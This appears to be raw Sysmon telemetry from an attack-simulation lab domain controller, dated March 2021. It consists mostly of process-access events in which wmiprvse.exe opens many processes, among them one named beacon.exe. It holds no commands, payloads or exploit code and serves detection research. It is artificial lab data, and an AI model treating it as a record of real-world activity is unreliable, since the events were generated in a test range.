16:54:43.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243371Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243370Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002243369Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:54:43.717{05ADC7E1-6DD3-603E-E0AA-00000000AD01}11056\PSHost.132591776835642407.11056.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002243368Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243367Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243366Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243365Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243364Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243363Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002243362Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.717{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE0E8FD966AE3A3B58FFCB82393F23A3,SHA256=8016868C21F5708E8B4694DA64300C4C7CFA0105E6F5BB716FFCA07222232F8E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243361Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243360Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243359Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243358Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243357Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243356Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243355Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243354Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243353Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243352Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243351Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 